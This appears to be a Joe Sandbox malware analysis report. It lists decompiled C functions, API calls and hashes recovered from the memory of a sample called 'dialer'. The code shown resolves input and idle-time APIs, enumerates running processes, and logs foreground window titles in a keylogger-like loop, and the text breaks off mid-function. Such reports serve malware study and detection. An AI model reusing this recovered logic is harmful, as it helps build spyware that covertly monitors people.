APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013A1
GetProcAddress.KERNEL32(00000000), ref: 004013A8

Strings

GetCursorInfo, xrefs: 00401397
User32.dll, xrefs: 0040139C

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: e391e7f58ddd6f85363347764197a1ee543d9a7801bc0fe363ffb3f057bbb63e
Instruction ID: d3bda5949b9d116e285d55fbc59b8e5d8e53a04c9e9cedd27b105f6a33248ad0
Opcode Fuzzy Hash: e391e7f58ddd6f85363347764197a1ee543d9a7801bc0fe363ffb3f057bbb63e
Instruction Fuzzy Hash: 31B092F1580B00AB87007FA0AC0D9193EA4F648743F2045BAF042929A1EBB891148F1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401452, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401452() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x46ca68 = _t2;
				return _t2;
			}

0x00401463
0x00401469
0x0040146e

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 0040145C
GetProcAddress.KERNEL32(00000000), ref: 00401463

Strings

User32.dll, xrefs: 00401457
GetLastInputInfo, xrefs: 00401452

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: c7935df8b6a38178698e2295717041de868490c523127cd3d72a117022a8c59f
Instruction ID: a8f1c5a083774e383246da89c7c1d95a8e0abaf71fe038d6a5d2766fcd81b51d
Opcode Fuzzy Hash: c7935df8b6a38178698e2295717041de868490c523127cd3d72a117022a8c59f
Instruction Fuzzy Hash: 69B092F4641B00AB8700AFE0AC8DA053EA8A644B47F2002A3B09196961EBB88244CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040146F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040146F() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x46ca6c = _t2;
				return _t2;
			}

0x00401480
0x00401486
0x0040148b

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00401479
GetProcAddress.KERNEL32(00000000), ref: 00401480

Strings

kernel32.dll, xrefs: 00401474
GetConsoleWindow, xrefs: 0040146F

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetConsoleWindow$kernel32.dll
API String ID: 2574300362-100875112
Opcode ID: e3ac8940ee1cd37045cf06dacc4217d977a61d04c0bc9ee1a52c0efbbd79daa2
Instruction ID: 5a97185418b63760bbf8986895f03466fab36a6e56cd4c50a02a3f426b50f970
Opcode Fuzzy Hash: e3ac8940ee1cd37045cf06dacc4217d977a61d04c0bc9ee1a52c0efbbd79daa2
Instruction Fuzzy Hash: C3B092B5681B00ABCA106FA2AD0DA0A3E68A604B43B1044A2F15582561EAB882048F1E

Uniqueness

Uniqueness Score: -1.00%

Function 00442490, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00442490(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				L00434E17(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0x74000000
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00450650( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00450650( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xff8bc35f
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00431810(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00450650( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00450350();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00450350();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00450350();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00442793(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00450730(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = L00439E14();
					_t183 = 0x22;
					 *_t129 = _t183;
					E0043626D();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

APIs

_strrchr.LIBCMT ref: 0044251B
__alldvrm.LIBCMT ref: 0044271C
__alldvrm.LIBCMT ref: 0044273E

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 23a1a2d90236b02b2083a87cd05f4a9d3c3254100ec0a3a0d8469f59a596ace0
Instruction ID: 63a792aad3bfe3cbde7ecdf4ead5abea7afdf704ef8a669ef2216d63f232220a
Opcode Fuzzy Hash: 23a1a2d90236b02b2083a87cd05f4a9d3c3254100ec0a3a0d8469f59a596ace0
Instruction Fuzzy Hash: C0A158719003869FFB118F28C9917AEBBA4EF55310F5541AFF4859B382C6BC9D41C758

Uniqueness

Uniqueness Score: -1.00%

Function 0043B0B1, Relevance: 6.1, APIs: 4, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0043B0B1(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E0043B1FE(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E00450430(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x4591c8;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x459194;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E00450430( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E00450430(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E00450430(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = L00439E14();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = L00439E14();
					_t102 = 0x16;
					 *_t69 = _t102;
					E0043626D();
					goto L11;
				}
				_t71 = L00439E14();
				_t103 = 0x16;
				 *_t71 = _t103;
				E0043626D();
				return _t103;
			}

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ca7261ae704e926ef2e87033f740578fb49095d9bc2293d227a698108ee9142
Instruction ID: fabbc6a6f7032cda4dd40e8c936e700ba33ba9abdb81f3509140ce19fd5ad8dd
Opcode Fuzzy Hash: 4ca7261ae704e926ef2e87033f740578fb49095d9bc2293d227a698108ee9142
Instruction Fuzzy Hash: 08410672A00304AFDB249F39CC51BAB7BA9EB8C714F10962FF211DB281D779994187C4

Uniqueness

Uniqueness Score: -1.00%

Function 00404C75, Relevance: 6.1, APIs: 4, Instructions: 128
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404C75(void* __ecx, void* __edx, intOrPtr _a4, _Unknown_base(*)()* _a8, char _a12) {
				signed int _v12;
				signed int _v16;
				void* _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __esi;
				void* _t41;
				signed int _t46;
				void* _t70;
				void* _t73;
				void* _t74;
				struct _SECURITY_ATTRIBUTES* _t77;
				void* _t101;
				intOrPtr _t103;
				void* _t105;
				void* _t106;
				void* _t107;

				_t101 = __edx;
				_v12 = _v12 & 0x00000000;
				_t105 = __ecx;
				_v20 = __ecx;
				 *(__ecx + 0x48) =  *(__ecx + 0x48) & 0x00000000;
				E004020B5(_t74,  &_v44);
				_t103 = _a4;
				_t8 = _t105 + 0x4c; // 0x46c184
				_t41 = _t8;
				while(L00404E1B(_t105, L00401F75(_t103),  &_v12, _t41) != 0) {
					_t10 = _t105 + 0x40; // 0x8
					_t46 =  *_t10 & 0x000000ff;
					_v16 = _t46;
					if(_v12 + _t46 <= E00402469()) {
						_t77 = 0;
						__eflags = 0;
					} else {
						_t77 = 1;
						_t73 = E00402469();
						_t105 = _v20;
						_t103 = _a4;
						 *((intOrPtr*)(_t105 + 0x48)) = _v16 + _v12 - _t73;
					}
					if(_t77 == 0) {
						_t78 = _v16;
						L00401FB1( &_v44, _t101, _t105, E00404286(_t103,  &_v68, _v16, 0xffffffff));
						L00401FA7();
						L00401FB1( &_v44, _t101, _t105, E00404286( &_v44,  &_v68, 0, _v12));
						L00401FA7();
						_t112 = _a12;
						if(_a12 != 0) {
							_t30 = _t105 + 0x1c; // 0x46c154
							L00401F8D(_t30,  &_v44);
							 *(_t105 + 0x34) = CreateEventA(0, 0, 0, 0);
							__eflags = 0;
							CreateThread(0, 0, _a8, _t105, 0, 0);
							_t33 = _t105 + 0x34; // 0x0
							WaitForSingleObject( *_t33, 0xffffffff);
							_t34 = _t105 + 0x34; // 0x0
							CloseHandle( *_t34);
						} else {
							_t107 = _t106 - 0x18;
							E004020CC(_t78, _t107, _t101, _t112,  &_v44);
							_a8(_t105);
							_t106 = _t107 + 0x1c;
						}
						L00401FB1(_t103, _t101, _t105, E00404286(_t103,  &_v68, _v12 + _t78, 0xffffffff));
						L00401FA7();
						_t70 = E00402469();
						_t38 = _t105 + 0x4c; // 0x46c184
						_t41 = _t38;
						if(_t70 != 0) {
							continue;
						}
					}
					break;
				}
				return L00401FA7();
			}

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0046C184), ref: 00404D62
CreateThread.KERNEL32(00000000,00000000,?,0046C138,00000000,00000000), ref: 00404D75
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00404C0E,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00404D80
CloseHandle.KERNEL32(00000000,?,?,00404C0E,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00404D89

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: c5ce04d09907905c520fbba6cf019decb7ff965027dd1b61e29ba09e69d3b713
Instruction ID: cbfc7610f1747364fbbe4b4b0207945bb515dde49c32b1736f6b22da19d138b3
Opcode Fuzzy Hash: c5ce04d09907905c520fbba6cf019decb7ff965027dd1b61e29ba09e69d3b713
Instruction Fuzzy Hash: 67414FB1900219AFDB10EBA5CC55DFEBB7DAF44325F04066EF512B32D1DB38AA058A64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5B1, Relevance: 6.1, APIs: 4, Instructions: 127
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D5B1(void* __ebx, void* __ecx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				char _v220;
				char _v244;
				char _v268;
				char _v292;
				char _v316;
				char _v340;
				char _v864;
				intOrPtr _v892;
				void* _v900;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t129;
				void* _t130;

				_t77 = __ecx;
				_t76 = __ebx;
				_t129 = __ecx;
				E004020B5(__ebx, __ecx);
				 *0x46beb4 = L00416F6C(_t77);
				_t130 = CreateToolhelp32Snapshot(2, 0);
				if(_t130 != 0) {
					_v900 = 0x22c;
					Process32FirstW(_t130,  &_v900);
					while(Process32NextW(_t130,  &_v900) != 0) {
						E0040425F(_t76,  &_v28,  &_v864);
						_t47 = E00416B7E(_t76,  &_v340, L00416F9A(_v892) & 0x000000ff);
						_t48 = E00416B7E(_t76,  &_v316, _v892);
						_t50 = E00416CF4(_t76,  &_v268, L00416FD0( &_v292, _v892));
						L00401FB1(_t129, _t58, _t130, E0040530D(_t76,  &_v52, L00402EFD( &_v76, E0040530D(_t76,  &_v100, L00402EFD( &_v124, E0040530D(_t76,  &_v148, L00402EFD( &_v172, E0040530D(_t76,  &_v196, E004074F2(_t76,  &_v220, _t129, __eflags, E00416CF4(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x460634), _t50), _t129, __eflags, 0x460634), _t48), _t129, __eflags, 0x460634), _t47), _t129, __eflags, "|"));
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401ED0();
						L00401FA7();
						L00401FA7();
						L00401ED0();
					}
					CloseHandle(_t130);
				}
				return _t129;
			}

APIs

Part of subcall function 00416F6C: GetCurrentProcess.KERNEL32(?,?,?,00417A29,WinDir,00000000,00000000), ref: 00416F7D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040D5D1
Process32FirstW.KERNEL32(00000000,?), ref: 0040D5F3
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D77A
CloseHandle.KERNEL32(00000000), ref: 0040D789

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
String ID:
API String ID: 592884611-0
Opcode ID: 716ab2d06d8a60fa4db77e097107724ca002d183ef2603b9f039fcd80d9d1449
Instruction ID: d2b0c1bf7218dab9c36398846b3bef5936211f0d8f53bb00f93021c478d55916
Opcode Fuzzy Hash: 716ab2d06d8a60fa4db77e097107724ca002d183ef2603b9f039fcd80d9d1449
Instruction Fuzzy Hash: 00414071A002195AC719FB61DC51EEEB375AF50304F5041BFB409A71E2EF786E8ACE88

Uniqueness

Uniqueness Score: -1.00%

Function 00408A53, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 82
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408A53() {
				char _v2004;
				char _v2012;
				char _v2028;
				void* _v2036;
				char _v2056;
				void* _v2060;
				char _v2080;
				void* _v2084;
				void* _t15;
				signed int _t17;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t59;
				void* _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t63 = _t62 & 0xfffffff8;
				_t69 = _t63;
				_t64 = _t63 - 0x81c;
				_push(_t34);
				_t59 = Sleep;
				_t61 = _t35;
				while(1) {
					E00431810(_t59,  &_v2004, 0, 0x7d0);
					_t65 = _t64 + 0xc;
					while(1) {
						_t15 = L00401F75(L00401E29(0x46c578, _t56, _t69, 0x2a));
						_t66 = _t65 - 0x18;
						E0040425F(_t34, _t66, _t15);
						_t17 = E00417417( &_v2012, _t56);
						_t65 = _t66 + 0x18;
						_t69 = _t17;
						if(_t17 != 0) {
							break;
						}
						Sleep(0x1f4);
					}
					_t56 = E004043E5(_t34,  &_v2056, L"\r\n[ ", __eflags, E0040425F(_t34,  &_v2028,  &_v2004));
					L00401EDA(_t61 + 4, _t20, _t61, E00403086(_t34,  &_v2080, _t20, _t59, __eflags, L" ]\r\n"));
					L00401ED0();
					L00401ED0();
					L00401ED0();
					_t67 = _t65 - 0x18;
					E00407352(_t34, _t67, _t56, __eflags, _t61 + 0x60);
					E00408744(_t61);
					while(1) {
						_t30 = L00401F75(L00401E29(0x46c578, _t56, __eflags, 0x2a));
						_t68 = _t67 - 0x18;
						E0040425F(_t34, _t68, _t30);
						_t32 = E00417417(0, _t56);
						_t64 = _t68 + 0x18;
						__eflags = _t32;
						if(__eflags == 0) {
							break;
						}
						Sleep(0x64);
					}
					E004095AB(_t34, _t61);
				}
			}

APIs

Part of subcall function 00417417: GetForegroundWindow.USER32(75146490,?), ref: 00417427
Part of subcall function 00417417: GetWindowTextLengthW.USER32(00000000), ref: 00417430
Part of subcall function 00417417: GetWindowTextW.USER32 ref: 0041745A

Sleep.KERNEL32(000001F4), ref: 00408AB1
Sleep.KERNEL32(00000064), ref: 00408B4B

Strings

[ , xrefs: 00408AC9
], xrefs: 00408AB5

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: a1bf6640d8231aa274d9fe40541848d5a6ba70444c51f545770990fb7b3e391b
Instruction ID: cca0d05e2164998ef68a958f21fdddd47f0264d2a0f8426d28c401fd19228762
Opcode Fuzzy Hash: a1bf6640d8231aa274d9fe40541848d5a6ba70444c51f545770990fb7b3e391b
Instruction Fuzzy Hash: 5721CFB1A0420067C604F676DD17A6E72699F80748F40043FF982772E3EE3DAA09869F

Uniqueness

Uniqueness Score: -1.00%

Function 00408BC2, Relevance: 6.1, APIs: 4, Instructions: 58
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00408BC2(void* __ecx, void* __edx) {
				void* __ebx;
				signed int _t8;
				int _t9;
				long _t14;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t30;

				_t22 = __edx;
				_t8 =  *0x46c3f8; // 0x0
				_t9 = _t8 |  *0x46c3fc;
				_t24 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x39)) = 0;
					do {
						_t9 = CreateFileW(L00401ECB(0x46c3b0), 0x80000000, 7, 0, 3, 0x80, 0);
						_t23 = _t9;
						if(_t23 == 0xffffffff) {
							 *((char*)(_t24 + 0x39)) = 0;
						} else {
							_t14 = GetFileSize(_t23, 0);
							_t30 = 0 -  *0x46c3fc; // 0x0
							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x46c3f8)) {
								 *((char*)(_t24 + 0x39)) = 1;
								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
									E004095AB(0, _t24);
								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t23);
						}
					} while ( *((char*)(_t24 + 0x39)) == 1);
					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
						_t35 =  *0x46a9d4 - 0x31;
